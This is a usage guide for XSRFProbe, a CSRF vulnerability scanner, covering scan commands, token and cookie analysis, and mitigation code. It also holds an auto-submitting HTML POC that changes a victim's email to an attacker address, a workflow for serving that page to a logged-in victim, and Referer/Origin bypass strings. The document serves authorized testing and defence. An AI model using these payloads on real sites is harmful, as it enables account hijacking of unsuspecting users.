XSRFProbe
Overview
XSRFProbe is a specialized CSRF (Cross-Site Request Forgery) vulnerability detection and exploitation toolkit designed for authorized security testing. It automates the identification of CSRF vulnerabilities by analyzing form structures, testing token validation mechanisms, and verifying HTTP method enforcement. XSRFProbe provides comprehensive CSRF assessment capabilities including POC generation and exploitation frameworks.
Key capabilities:
- Automated CSRF vulnerability detection
- Anti-CSRF token analysis and validation testing
- Referer header and origin header verification
- SameSite cookie attribute testing
- Cross-origin request analysis
- CSRF POC generation
- Cookie-based CSRF exploitation
Installation
From GitHub Source
git clone https://github.com/0xInfection/XSRFProbe.git
cd XSRFProbe
pip install -r requirements.txt
python xsrfprobe.py --help
Using pip
pip install xsrfprobe
xsrfprobe --help
Manual Installation
# Clone repository
git clone https://github.com/0xInfection/XSRFProbe.git
cd XSRFProbe
# Install Python 3.6+
python3 --version
# Install dependencies
pip3 install -r requirements.txt
# Run the tool
python3 xsrfprobe.py --help
docker pull xsrfprobe
docker run -it xsrfprobe --help
Kali Linux
apt update && apt install xsrfprobe -y
Basic Usage
| Command | Description |
|---|---|
| `xsrfprobe -u <url>` | Scan URL for CSRF vulnerabilities |
| `xsrfprobe -u <url> --crawl` | Crawl site and test all forms |
| `xsrfprobe -u <url> -c <cookies>` | Scan with authentication cookies |
| `xsrfprobe -u <url> --proxy <proxy>` | Scan through HTTP proxy |
| `xsrfprobe -u <url> -o <file>` | Output results to file |
| `xsrfprobe -u <url> --verbose` | Verbose output with details |
| `xsrfprobe -u <url> --batch` | Batch mode (no user interaction) |
Common Examples
Basic CSRF Detection
xsrfprobe -u https://example.com/settings
Analyzes the target URL for CSRF vulnerabilities. It identifies missing or weak anti-CSRF token protection, missing security headers, and other conditions that enable CSRF.
Crawling and Testing All Forms
xsrfprobe -u https://example.com --crawl --verbose
Crawls the application from the entry point, discovers all forms, and tests each one for CSRF vulnerabilities. Generates a detailed report of the findings.
Authenticated CSRF Testing
# Extract cookies from the browser or with curl
curl -c cookies.txt -b "session=value" https://example.com
# Test with authentication
xsrfprobe -u https://example.com/admin -c cookies.txt --crawl
Tests for CSRF vulnerabilities in the authenticated parts of the application by maintaining the session with the provided cookies.
Proxied Scanning
xsrfprobe -u https://example.com --proxy http://127.0.0.1:8080 --verbose
Routes all traffic through an intercepting proxy (for example Burp Suite) so the requests can be inspected and modified while the scan runs.
Batch Processing Multiple URLs
#!/bin/bash
# targets.txt holds one URL per line, for example:
cat targets.txt
# https://app1.example.com
# https://app2.example.com
# https://internal-app.local
# Quote "$url" so URLs with special characters survive word splitting;
# ${url//\//_} turns the slashes into underscores for a safe file name.
while read -r url; do
    [ -z "$url" ] && continue
    echo "Testing $url..."
    xsrfprobe -u "$url" --batch -o "${url//\//_}_csrf_results.txt"
    sleep 2
done < targets.txt
Advanced Usage
Comprehensive CSRF Assessment
# Full enumeration with crawling and verbose output
xsrfprobe -u https://example.com \
--crawl \
--verbose \
--batch \
-o csrf_assessment.txt
# View findings
cat csrf_assessment.txt
Cookie Analysis for CSRF Protection
# Test SameSite cookie attributes
xsrfprobe -u https://example.com \
--test-samesite \
--verbose
# Output shows:
# [+] SameSite=Strict detected
# or
# [-] No SameSite attribute (vulnerable to CSRF)
Token Validation Testing
# Analyze anti-CSRF token implementation
xsrfprobe -u https://example.com/form \
--test-token-validation \
--verbose
# Tests:
# - Token presence verification
# - Token uniqueness per request
# - Token lifetime validation
# - Token randomness
Header-Based CSRF Protection Testing
# Test Referer and Origin header enforcement
xsrfprobe -u https://example.com/action \
--test-headers \
--verbose
# Tests:
# - Referer header validation
# - Origin header validation
# - X-Requested-With header checking
CSRF Vulnerability Types
Type 1: No CSRF Protection
# Vulnerable form with no token or validation
xsrfprobe -u https://example.com/change-password
# Output:
# [!] CRITICAL: No anti-CSRF token detected
# [!] Form is vulnerable to CSRF attacks
# [+] POC generation possible
Type 2: Weak Token Validation
# Application uses predictable tokens
xsrfprobe -u https://example.com/settings \
--analyze-tokens \
--verbose
# Output analysis:
# [-] Token appears predictable/sequential
# [-] Token not properly validated
# [-] Same token valid across multiple requests
Type 3: Insufficient Header Validation
# Application checks some but not all headers
xsrfprobe -u https://example.com/transfer \
--test-headers \
--verbose
# Findings:
# [+] Referer header checked
# [-] Origin header not validated
# [-] Can bypass with careful request crafting
Type 4: Cookie-Based CSRF (CSURF)
# Vulnerable to cookie-based CSRF
xsrfprobe -u https://example.com/api/action \
--test-cookie-csrf \
--verbose
# Output:
# [!] Application uses cookie-based CSRF tokens
# [!] Vulnerable if Same-Site cookie not enforced
POC Generation and Exploitation
Generating CSRF Proof-of-Concept
# Generate HTML POC for vulnerable endpoint
xsrfprobe -u https://example.com/change-email --generate-poc
# Creates csrf_poc.html containing:
# <form action="https://example.com/change-email" method="POST">
# <input type="hidden" name="email" value="attacker@evil.com">
# <input type="submit" value="Click here">
# </form>
# <script>document.forms[0].submit();</script>
Analyzing Generated POCs
# Generate and examine POC
xsrfprobe -u https://example.com/settings --generate-poc -o poc.html
# View generated POC
cat poc.html
# The POC will be:
# - Auto-submitting if form action identified
# - Clickable if parameters are complex
# - Customizable for different attack scenarios
POC Testing Workflow
#!/bin/bash
# Step 1: Identify CSRF vulnerability
xsrfprobe -u https://target.com/action --batch
# Step 2: Generate POC
xsrfprobe -u https://target.com/action --generate-poc -o attack.html
# Step 3: Set up attacker server
# cd /tmp && python3 -m http.server 8000
# Step 4: Serve POC to victim
# Visit http://attacker-server:8000/attack.html while logged into target
# Step 5: Verify exploitation
# Check target application for changes
Token Analysis and Validation
Analyzing Anti-CSRF Token Implementation
# Extract and analyze tokens
xsrfprobe -u https://example.com/form \
--analyze-tokens \
--extract-tokens \
--verbose
# Output shows:
# Token Name: csrf_token
# Token Value: a1b2c3d4e5f6g7h8
# Token Length: 32 characters
# Token Pattern: Alphanumeric
# Token Entropy: High
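The token summary above (length, pattern, entropy, predictability) can be reproduced offline on tokens collected from repeated requests to one form. The script below is an added example, not part of XSRFProbe; the sample tokens are constructed, and the entropy figure is a symbol-frequency heuristic that flags biased or repetitive alphabets rather than a proof of randomness.

```python
import math
import re
from collections import Counter

# Constructed sample tokens (not captured values) for the demonstration.
RANDOM_TOKENS = ["f3a9c2e17b4d8e06", "0b7e5d19a4c3f28e", "9e1c4b7a2d6f0385", "4d82f1a7c9e3b065"]
SEQUENTIAL_TOKENS = ["tok1001", "tok1002", "tok1003", "tok1004"]

def entropy_bits_per_char(token: str) -> float:
    """Shannon entropy of the token's own symbol frequencies (heuristic only)."""
    n = len(token)
    return -sum(c / n * math.log2(c / n) for c in Counter(token).values())

def char_pattern(token: str) -> str:
    """Classify the token alphabet, narrowest class first."""
    for label, pat in (("Numeric", r"[0-9]+"), ("Hexadecimal", r"[0-9a-fA-F]+"),
                       ("Alphanumeric", r"[A-Za-z0-9]+"), ("Base64-like", r"[A-Za-z0-9+/=_-]+")):
        if re.fullmatch(pat, token):
            return label
    return "Mixed"

def looks_sequential(tokens: list) -> bool:
    """True when every token ends in a number and consecutive tokens differ by a constant step."""
    matches = [re.search(r"(\d+)$", t) for t in tokens]
    if len(tokens) < 3 or not all(matches):
        return False
    nums = [int(m.group(1)) for m in matches]
    steps = {b - a for a, b in zip(nums, nums[1:])}
    return len(steps) == 1 and 0 not in steps

def analyze_tokens(tokens: list) -> dict:
    """Summarise a set of tokens collected from repeated requests to one form."""
    avg_bits = sum(entropy_bits_per_char(t) for t in tokens) / len(tokens)
    sequential = looks_sequential(tokens)
    reused = len(set(tokens)) < len(tokens)          # same token handed out twice
    pattern = char_pattern(tokens[0])
    if sequential or reused or pattern == "Numeric" or len(tokens[0]) < 16:
        rating = "Low"
    elif avg_bits >= 3.0:
        rating = "High"
    else:
        rating = "Medium"
    return {"length": len(tokens[0]), "pattern": pattern, "entropy_per_char": round(avg_bits, 2),
            "sequential": sequential, "reused": reused, "rating": rating}

if __name__ == "__main__":
    for name, sample in (("random", RANDOM_TOKENS), ("sequential", SEQUENTIAL_TOKENS)):
        print(name, analyze_tokens(sample))
```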
Testing Token Reusability
# Test if the same token can be used multiple times
xsrfprobe -u https://example.com/action \
--test-token-reuse \
--verbose
# Results:
# [+] Token properly rotated after request
# or
# [-] Token reused across requests (vulnerable)
Token Lifetime Analysis
# Test token expiration (wait up to 1 hour for the token to expire)
xsrfprobe -u https://example.com/form \
--test-token-lifetime \
--timeout 3600 \
--verbose
# Determines:
# - Token validity period
# - If tokens expire properly
# - If old tokens are rejected
Integration with Other Tools
Burp Suite Integration
# Route XSRFProbe through Burp
xsrfprobe -u https://example.com \
--proxy http://127.0.0.1:8080 \
--crawl \
--verbose
# All requests visible in Burp for:
# - Manual testing
# - Request modification
# - Advanced analysis
Web Application Firewall (WAF) Detection
# Test with WAF bypass techniques
xsrfprobe -u https://example.com \
--test-waf-bypass \
--verbose
# Tests various bypass techniques:
# - Case variation in headers
# - Double URL encoding
# - Protocol variation (HTTP vs HTTPS)
Chaining with Other Vulnerability Tests
# Combine CSRF with XSS detection
# CSRF + XSS = Wormable vulnerability
# Example workflow:
# 1. Find XSS vulnerability in comments
# 2. Find CSRF in action endpoint
# 3. Combine: XSS payload triggers CSRF attack
# Test both vulnerabilities
xsrfprobe -u https://example.com/settings --crawl
# Also run XSS scanner
Advanced Techniques
Chaining CSRF with Session Fixation
# If application has session fixation vulnerability
# CSRF can be used to set victim's session ID
xsrfprobe -u https://example.com/account \
--test-session-fixation \
--verbose
# Exploitation:
# 1. Attacker sets own session
# 2. Uses CSRF to force victim to same session
# 3. Attacker can then access victim's account
Exploiting JSON-Based APIs
# Test CSRF on JSON APIs
xsrfprobe -u https://api.example.com/v1/settings \
--content-type json \
--method POST \
--verbose
# Analysis:
# - Content-Type header mismatch
# - Lack of CORS preflight validation
# - Missing token validation on JSON
Testing HTTP Method Override
# Some apps accept HTTP method override headers
xsrfprobe -u https://example.com/delete \
--method GET \
--override-method DELETE \
--verbose
# Tests:
# - X-HTTP-Method-Override header
# - X-Method-Override header
# - Allows CSRF via GET requests
Cookie and Header Analysis
SameSite Cookie Testing
# Test SameSite attribute enforcement
xsrfprobe -u https://example.com \
--test-samesite \
--verbose
# Results show:
# [+] SameSite=Strict (Excellent)
# [+] SameSite=Lax (Good)
# [-] SameSite=None without Secure
# [-] No SameSite attribute
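The grading scale above can be applied directly to Set-Cookie headers captured during a scan. This is an added example, not XSRFProbe code; the headers are constructed, and it adds one case the list above does not show (SameSite=None with Secure), which browsers do send cross-site, so that cookie gives no CSRF protection on its own.

```python
# Constructed Set-Cookie headers (not captured from any real site) for the demonstration.
SAMPLE_HEADERS = [
    "sid=abc123; Path=/; Secure; HttpOnly; SameSite=Strict",
    "prefs=dark; Path=/; SameSite=Lax",
    "track=1; Path=/; SameSite=None",
    "legacy=xyz; Path=/; HttpOnly",
    "api=tok; Path=/; Secure; SameSite=None",
]

def parse_set_cookie(header: str) -> dict:
    """Split a Set-Cookie header into name, value and a lower-cased attribute map."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")      # flags like Secure have no value
        attrs[key.strip().lower()] = val.strip()
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}

def grade_samesite(header: str) -> tuple:
    """Return (marker, finding) on the same scale XSRFProbe's output uses."""
    attrs = parse_set_cookie(header)["attrs"]
    samesite = attrs.get("samesite", "").lower()
    secure = "secure" in attrs
    if samesite == "strict":
        return "[+]", "SameSite=Strict (Excellent)"
    if samesite == "lax":
        return "[+]", "SameSite=Lax (Good)"
    if samesite == "none":
        if not secure:
            # Chromium-based browsers refuse to store SameSite=None cookies without Secure.
            return "[-]", "SameSite=None without Secure"
        return "[-]", "SameSite=None; Secure (sent cross-site, relies on token protection)"
    # Chromium defaults a missing attribute to Lax, but not every browser does,
    # so the application cannot rely on it.
    return "[-]", "No SameSite attribute"

def report(headers: list) -> list:
    """One (cookie name, marker, finding) tuple per Set-Cookie header."""
    return [(parse_set_cookie(h)["name"],) + grade_samesite(h) for h in headers]

if __name__ == "__main__":
    for name, marker, finding in report(SAMPLE_HEADERS):
        print(f"{marker} {name}: {finding}")
```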
Referer Header Validation
# Test Referer header enforcement
xsrfprobe -u https://example.com/action \
--test-referer \
--verbose
# Tests:
# - Referer validation present
# - Referer validation can be bypassed
# - Referer policies (strict vs loose)
Custom Header Requirements
# Test for X-Requested-With header
xsrfprobe -u https://example.com/api \
--test-custom-headers \
--verbose
# Checks:
# - X-Requested-With: XMLHttpRequest
# - X-CSRF-Token header
# - Other custom security headers
Real-World Assessment Workflow
Complete CSRF Security Audit
#!/bin/bash
TARGET="https://example.com"
OUTPUT="csrf_audit_$(date +%Y%m%d_%H%M%S)"
mkdir -p "$OUTPUT"
# Step 1: Full crawl and assessment
echo "[*] Starting CSRF audit..."
xsrfprobe -u "$TARGET" \
--crawl \
--verbose \
--batch > "$OUTPUT/full_assessment.txt" 2>&1
# Step 2: Analyze token implementation
echo "[*] Analyzing tokens..."
xsrfprobe -u "$TARGET/settings" \
--analyze-tokens \
--extract-tokens > "$OUTPUT/token_analysis.txt" 2>&1
# Step 3: Test headers and cookies
echo "[*] Testing security headers..."
xsrfprobe -u "$TARGET" \
--test-samesite \
--test-referer \
--test-headers > "$OUTPUT/headers_analysis.txt" 2>&1
# Step 4: Identify exploitable forms
echo "[*] Identifying vulnerable endpoints..."
grep -i "vulnerable\|critical" "$OUTPUT/full_assessment.txt" > "$OUTPUT/vulnerable_endpoints.txt"
# Step 5: Generate POCs for critical vulns (one per distinct URL in the findings)
echo "[*] Generating POCs..."
grep -oP 'https?://[^\s]+' "$OUTPUT/vulnerable_endpoints.txt" | sort -u | while read -r url; do
    xsrfprobe -u "$url" --generate-poc -o "$OUTPUT/${url//\//_}_poc.html" 2>/dev/null
done
echo "[+] Audit complete. Results in $OUTPUT/"
Risk Assessment and Prioritization
#!/bin/bash
# Parse XSRFProbe results and prioritize by impact
xsrfprobe -u https://target.com --crawl > results.txt
echo "=== CRITICAL CSRF Vulnerabilities ==="
grep -i "no anti-csrf\|critical" results.txt | head -10
echo ""
echo "=== HIGH Risk Endpoints ==="
grep -i "weak token\|insufficient\|high" results.txt | head -10
echo ""
echo "=== Summary ==="
echo "Total vulnerabilities found:"
grep -i "vulnerable" results.txt | wc -l
Testing Methodology
OWASP CSRF Testing Guide
# Test 1: Identify CSRF tokens
xsrfprobe -u https://example.com/form --extract-tokens
# Test 2: Analyze token generation
# - Check for proper randomization
# - Verify tokens are unpredictable
xsrfprobe -u https://example.com/form --analyze-tokens --verbose
# Test 3: Test token validation
# - Remove token
# - Modify token
# - Reuse old tokens
xsrfprobe -u https://example.com/form --test-token-validation
# Test 4: Test token scope
# - Same token for different forms
# - Cross-user token reuse
xsrfprobe -u https://example.com/form --test-token-scope
# Test 5: Test HTTP method enforcement
# - POST vs GET
# - PUT vs DELETE
xsrfprobe -u https://example.com/action --test-methods
# Test 6: Test header validation
# - Referer requirement
# - Origin requirement
# - Custom header requirements
xsrfprobe -u https://example.com/action --test-headers
# Test 7: Test cookie scope
# - SameSite attribute
# - Secure flag
# - HttpOnly flag
xsrfprobe -u https://example.com --test-cookies
Bypassing CSRF Protections
Common Protection Bypasses (Educational)
# Bypass 1: Case sensitivity in headers
# If Referer checking: try referer vs Referer vs REFERER
# Bypass 2: Double encoding
# Original: example.com
# Encoded: %65%78%61%6d%70%6c%65%2e%63%6f%6d
# Bypass 3: NULL byte injection (legacy)
# Referer: example.com%00.attacker.com
# Bypass 4: Subdomain matching weakness
# If checking origin: subdomain.example.com
# Attacker uses: example.com.attacker.com
# XSRFProbe tests all these automatically
xsrfprobe -u https://example.com --test-bypass-techniques --verbose
Best Practices
- Authorization: Always obtain written permission before testing
- Non-Destructive: Only test for vulnerability, don’t modify data
- Controlled Environment: Test on staging servers when possible
- Documentation: Record all findings with timestamps
- Remediation: Provide recommendations for fixing issues
- Responsible Disclosure: Follow coordinated disclosure practices
- Verification: Manually verify critical findings
- Education: Help developers understand CSRF risks and mitigation
CSRF Mitigation Recommendations
Proper Token Implementation
1. Generate unique token per session
2. Token should be unpredictable (cryptographically random)
3. Validate token on every state-changing request
4. Token should have short lifetime
5. Token should not be logged or transmitted via GET
Alternative Protections
1. SameSite cookie attribute (Strict or Lax)
2. Referer header validation
3. Custom header requirements (X-Requested-With)
4. Double submit cookie pattern
5. User confirmation for critical actions
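The token rules above and the first three alternative protections fit in one small server-side check. The class below is an added, hypothetical example written for this page (not XSRFProbe code and not any framework's API): a per-session token from the OS CSPRNG with a 15-minute lifetime (an assumed policy value), constant-time comparison, a whole-string Origin/Referer match against the site origin, a token accepted only from the body or a custom header (never the URL), and a session cookie issued with SameSite=Lax.

```python
import hmac
import secrets
import time
from urllib.parse import urlsplit

STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}
TOKEN_TTL_SECONDS = 15 * 60   # assumed policy value: tokens expire after 15 minutes

class CsrfGuard:
    """Synchronizer-token CSRF check plus Origin/Referer validation (hypothetical helper)."""

    def __init__(self, site_origin: str, now=time.time):
        self.site_origin = site_origin   # exact origin, e.g. "https://example.com"
        self.now = now                   # injectable clock so lifetime checks are testable

    def issue_token(self, session: dict) -> str:
        """Per-session token from the OS CSPRNG (256 bits), with its issue time recorded."""
        session["csrf_token"] = secrets.token_urlsafe(32)
        session["csrf_issued"] = self.now()
        return session["csrf_token"]

    def session_cookie(self, session_id: str) -> str:
        """Set-Cookie value for the session cookie; SameSite=Lax keeps it off cross-site POSTs."""
        return f"sid={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"

    def _origin_ok(self, headers: dict) -> bool:
        """Whole-string comparison with the site origin: no prefix or suffix matching,
        so an origin such as example.com.attacker.example cannot pass."""
        origin = headers.get("origin")
        if origin is None and "referer" in headers:
            u = urlsplit(headers["referer"])
            origin = f"{u.scheme}://{u.netloc}"
        return origin == self.site_origin

    def check_request(self, session: dict, method: str, headers: dict, form: dict):
        """Return (allowed, reason). Only state-changing methods require the token."""
        headers = {k.lower(): v for k, v in headers.items()}
        if method.upper() not in STATE_CHANGING:
            return True, "read-only method; state must not change on GET"
        if not self._origin_ok(headers):
            return False, "Origin/Referer missing or not this site"
        expected = session.get("csrf_token")
        if not expected:
            return False, "no token issued for this session"
        if self.now() - session["csrf_issued"] > TOKEN_TTL_SECONDS:
            return False, "token expired"
        # Read the token from the form body or a custom header only, never from the
        # query string, so it is not written to logs or leaked through Referer headers.
        presented = form.get("csrf_token") or headers.get("x-csrf-token", "")
        if not hmac.compare_digest(presented.encode(), expected.encode()):
            return False, "token missing or mismatched"
        return True, "ok"
```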
Troubleshooting
Form Detection Issues
# If forms are not detected
xsrfprobe -u https://example.com --crawl --verbose
# Manually check for forms
curl -s https://example.com | grep -i "<form"
# If forms exist but not detected:
# - Forms may be dynamically generated (JavaScript)
# - Forms may require authentication
# - Use --crawl with authentication cookies
Token Extraction Failures
# If tokens are not extracted
xsrfprobe -u https://example.com/form \
--extract-tokens \
--verbose
# Common reasons:
# - Non-standard token name
# - Token in header instead of form
# - Token in JSON response
# - Token injected via JavaScript
Conclusion
XSRFProbe is an essential tool for comprehensive CSRF vulnerability assessment during authorized security testing. Its automated detection, token analysis, and POC generation capabilities make it invaluable for identifying and validating CSRF vulnerabilities in web applications.